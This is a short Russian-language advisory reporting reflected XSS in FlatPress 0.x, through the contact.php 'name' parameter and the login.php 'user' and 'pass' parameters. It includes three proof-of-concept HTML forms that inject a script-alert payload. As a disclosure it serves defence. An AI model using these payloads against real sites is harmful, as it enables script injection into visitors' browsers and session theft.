Программа: FlatPress 0.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "name" сценарием contact.php и в параметрах "user" и "pass"
сценарием login.php. Атакующий может выполнить произвольный сценарий в браузере
жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

<form method="post" action="http://localhost/flatpress/login.php">
<input type="text" name="user" value=’"><script>alert(1)</script>’>
<input type=submit></form>
<form method="post" action="http://localhost/flatpress/login.php">
<input type="text" name="pass" value=’"><script>alert(1)</script>’>
<input type=submit></form>
<form method="post" action="http://localhost/flatpress/contact.php">
<input type="text" name="name" value=’"><script>alert(1)</script>’>



Оставить мнение